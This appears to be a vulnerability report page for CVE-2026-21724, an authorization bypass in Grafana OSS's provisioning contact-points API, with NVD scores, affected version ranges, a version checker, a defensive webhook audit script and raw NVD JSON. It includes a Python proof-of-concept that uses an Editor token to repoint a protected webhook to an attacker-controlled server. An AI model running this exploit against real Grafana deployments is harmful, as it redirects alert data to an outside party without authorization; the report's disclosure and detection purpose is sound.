Security Vulnerability Report
CVE-2026-21724 CVSS 5.4 MEDIUM

Published: 2026-03-26 21:17:03
Last Modified: 2026-04-14 01:00:11

Description

Grafana OSS contains an authorization bypass in the provisioning contact points API: a user holding only the Editor role can modify protected webhook URLs without the alert.notifications.receivers.protected:write permission that is required to change a protected receiver. NVD records the weakness as CWE-285 (Improper Authorization).

CVSS Details

CVSS Score
5.4 (secondary metric; the primary metric in the NVD record scores it 4.3)
Severity
MEDIUM (both metrics)
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N (secondary metric)
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N (primary metric; it rates the confidentiality impact as None, which accounts for the lower score)

Configurations (Affected Products)

cpe:2.3:a:grafana:grafana:*:*:*:*:-:*:*:* - VULNERABLE, from 11.6.9 (inclusive) up to but excluding 11.6.14
cpe:2.3:a:grafana:grafana:*:*:*:*:-:*:*:* - VULNERABLE, from 12.1.5 (inclusive) up to but excluding 12.1.10
cpe:2.3:a:grafana:grafana:*:*:*:*:-:*:*:* - VULNERABLE, from 12.2.2 (inclusive) up to but excluding 12.2.8
cpe:2.3:a:grafana:grafana:*:*:*:*:-:*:*:* - VULNERABLE, from 12.3.1 (inclusive) up to but excluding 12.3.6
Grafana OSS (see the official security advisory for the exact affected versions). Per the NVD ranges, the first release outside the affected window on each branch is 11.6.14, 12.1.10, 12.2.8 and 12.3.6 respectively.
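
To turn the four NVD ranges above into a check, here is an added example (written for this page, not code from the report or from Grafana) that tests whether a Grafana instance's reported version, as shown in the UI footer or in the "version" field of /api/health, falls inside one of them. The ranges are the ones listed above; the sample version strings in the script are constructed. A result of "not in a listed range" only means NVD does not list that version, not that it is safe: builds older than each range start are simply outside the data, so consult the vendor advisory for those.

```python
from typing import Optional, Tuple

# (versionStartIncluding, versionEndExcluding) pairs copied from the NVD
# configuration for CVE-2026-21724.
AFFECTED_RANGES = [
    ("11.6.9", "11.6.14"),
    ("12.1.5", "12.1.10"),
    ("12.2.2", "12.2.8"),
    ("12.3.1", "12.3.6"),
]


def parse_version(v: str) -> Tuple[int, ...]:
    """Turn '12.3.1' (optionally 'v12.3.1', '12.3.1+security-01' or '12.3.1-pre')
    into a comparable tuple. Build metadata and pre-release tags are dropped;
    only the numeric core is compared, padded to three components."""
    core = v.strip().lstrip("v").split("+", 1)[0].split("-", 1)[0]
    nums = []
    for part in core.split("."):
        if not part.isdigit():
            raise ValueError(f"unparseable version component {part!r} in {v!r}")
        nums.append(int(part))
    while len(nums) < 3:
        nums.append(0)
    return tuple(nums)


def affected_range(version: str) -> Optional[Tuple[str, str]]:
    """Return the (start, end_excluding) range that contains `version`,
    or None when no listed range contains it."""
    parsed = parse_version(version)
    for start, end in AFFECTED_RANGES:
        if parse_version(start) <= parsed < parse_version(end):
            return (start, end)
    return None


def is_affected(version: str) -> bool:
    return affected_range(version) is not None


if __name__ == "__main__":
    # Constructed sample inputs: range edges, a security-release suffix, and
    # versions outside every listed range.
    for sample in ["11.6.9", "11.6.14", "12.1.7+security-01", "12.3.5",
                   "12.3.6", "12.4.0", "11.6.8"]:
        rng = affected_range(sample)
        if rng:
            print(f"{sample:20s} AFFECTED ({rng[0]} <= v < {rng[1]})")
        else:
            print(f"{sample:20s} not in a listed range (check the advisory)")
```

The comparison deliberately ignores the "+security-NN" build suffix Grafana uses for its security releases, because the NVD ranges are expressed on the plain semantic version; if your deployment tracks those suffixed builds, compare the numeric core exactly as the script does and read the advisory for the suffixed release that carries the fix.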

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import os
import sys

import requests

# Grafana's documented provisioning endpoint for updating a contact point is
# PUT /api/v1/provisioning/contact-points/{uid}. The base URL and the UID of the
# protected webhook receiver are placeholders to fill in for the target.
base_url = os.environ.get("GRAFANA_URL", "http://target-grafana")
contact_point_uid = os.environ.get("CONTACT_POINT_UID", "<protected-webhook-uid>")
target_url = f"{base_url}/api/v1/provisioning/contact-points/{contact_point_uid}"

# Body that rewrites the receiver's webhook URL. A correctly authorized server
# refuses this from an Editor, because the receiver is protected and the caller
# lacks alert.notifications.receivers.protected:write; the vulnerable versions
# accept it.
payload = {
    "name": "Webhook-Modified",
    "type": "webhook",
    "settings": {
        "url": "http://attacker-controlled-server/webhook",
        "httpMethod": "POST",  # key name used by Grafana's webhook settings
    },
    "isDefault": False,
    "provenance": "api",  # read-only in Grafana's contact-point model; kept from the original PoC
}

headers = {
    "Content-Type": "application/json",
    # Token (service account token or API key) that carries only the Editor role.
    "Authorization": "Bearer " + os.environ.get("GRAFANA_EDITOR_TOKEN", "<Editor_Role_Token>"),
}

try:
    response = requests.put(target_url, json=payload, headers=headers, timeout=10)
except requests.RequestException as e:
    print(f"[-] Error: {e}")
    sys.exit(1)

# A 200/202 to a PUT on a protected receiver from an Editor-only token means
# the authorization check was bypassed.
if response.status_code in (200, 202):
    print("[+] PoC Successful: Protected webhook URL modified without elevated permissions.")
else:
    print(f"[-] PoC Failed: Status Code {response.status_code}")
    print(response.text)
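
On the defensive side, the change this PoC makes leaves a trace in the receiver configuration itself: a webhook URL pointing somewhere it should not. The following added example (not part of the report and not Grafana code) audits a list of contact points in the shape returned by GET /api/v1/provisioning/contact-points and flags webhook receivers whose URL host is off an allowlist or which do not use HTTPS. The sample contact points and the allowlist hosts are constructed for the example so it runs offline; in practice you would feed it the JSON fetched from that endpoint with a token that can read provisioning data.

```python
import json
from urllib.parse import urlparse

# Constructed sample mirroring the shape of GET /api/v1/provisioning/contact-points:
# a PagerDuty receiver (no URL), a file-provisioned internal webhook, and a webhook
# rewritten to an external host, as the PoC above would leave it.
SAMPLE_CONTACT_POINTS = json.loads("""
[
  {"uid": "pd-oncall", "name": "pagerduty-oncall", "type": "pagerduty",
   "settings": {"integrationKey": "[REDACTED]"}, "provenance": "api"},
  {"uid": "hook-ops", "name": "ops-webhook", "type": "webhook",
   "settings": {"url": "https://alerts.internal.example/hook", "httpMethod": "POST"},
   "provenance": "file"},
  {"uid": "hook-mod", "name": "Webhook-Modified", "type": "webhook",
   "settings": {"url": "http://attacker-controlled-server/webhook", "httpMethod": "POST"},
   "provenance": "api"}
]
""")

# Hosts that alert webhooks in this hypothetical environment are allowed to reach.
ALLOWED_WEBHOOK_HOSTS = {"alerts.internal.example", "hooks.slack.com"}


def receiver_url(contact_point):
    """Return the outbound URL configured on a receiver, or None if its type has none."""
    return contact_point.get("settings", {}).get("url")


def audit_contact_points(contact_points, allowed_hosts):
    """Return one (uid, name, url, reason) tuple per receiver that breaks a rule.

    Rules: the URL's host must be on the allowlist, and the scheme must be https.
    A receiver failing the host rule is reported once, on that rule only.
    """
    findings = []
    for cp in contact_points:
        url = receiver_url(cp)
        if not url:
            continue
        parsed = urlparse(url)
        if parsed.hostname not in allowed_hosts:
            findings.append((cp["uid"], cp["name"], url,
                             f"host {parsed.hostname!r} is not on the webhook allowlist"))
        elif parsed.scheme != "https":
            findings.append((cp["uid"], cp["name"], url, "webhook URL is not https"))
    return findings


if __name__ == "__main__":
    # Real run: pipe in the output of
    #   curl -H "Authorization: Bearer $TOKEN" "$GRAFANA_URL/api/v1/provisioning/contact-points"
    for uid, name, url, reason in audit_contact_points(SAMPLE_CONTACT_POINTS, ALLOWED_WEBHOOK_HOSTS):
        print(f"[!] {uid} ({name}): {url} -> {reason}")
```

Run it on a schedule and diff the findings against the previous run; on an affected version a new finding on a receiver that Editors can reach is exactly the symptom this CVE produces, and the fix is to upgrade to a release outside the ranges listed above.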

References

https://grafana.com/security/security-advisories/cve-2026-21724 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21724", "sourceIdentifier": "[email protected]", "published": "2026-03-26T21:17:03.227", "lastModified": "2026-04-14T01:00:10.760", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability has been discovered in Grafana OSS where an authorization bypass in the provisioning contact points API allows users with Editor role to modify protected webhook URLs without the required alert.notifications.receivers.protected:write permission."}, {"lang": "es", "value": "Se ha descubierto una vulnerabilidad en Grafana OSS donde una omisión de autorización en la API de puntos de contacto de aprovisionamiento permite a los usuarios con rol de Editor modificar URLs de webhook protegidas sin el permiso requerido alert.notifications.receivers.protected:write."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": 
[{"vulnerable": true, "criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:-:*:*:*", "versionStartIncluding": "11.6.9", "versionEndExcluding": "11.6.14", "matchCriteriaId": "B333C05C-D6CC-4292-B54B-5D081FE92C6E"}, {"vulnerable": true, "criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:-:*:*:*", "versionStartIncluding": "12.1.5", "versionEndExcluding": "12.1.10", "matchCriteriaId": "252E74A8-BC0A-420D-A937-84AAE46C8BDA"}, {"vulnerable": true, "criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:-:*:*:*", "versionStartIncluding": "12.2.2", "versionEndExcluding": "12.2.8", "matchCriteriaId": "409163A6-7B0A-4E46-AD47-620AFC841A9B"}, {"vulnerable": true, "criteria": "cpe:2.3:a:grafana:grafana:*:*:*:*:-:*:*:*", "versionStartIncluding": "12.3.1", "versionEndExcluding": "12.3.6", "matchCriteriaId": "875BA099-9D0F-4DC0-80DF-5F35D06097AC"}]}]}], "references": [{"url": "https://grafana.com/security/security-advisories/cve-2026-21724", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}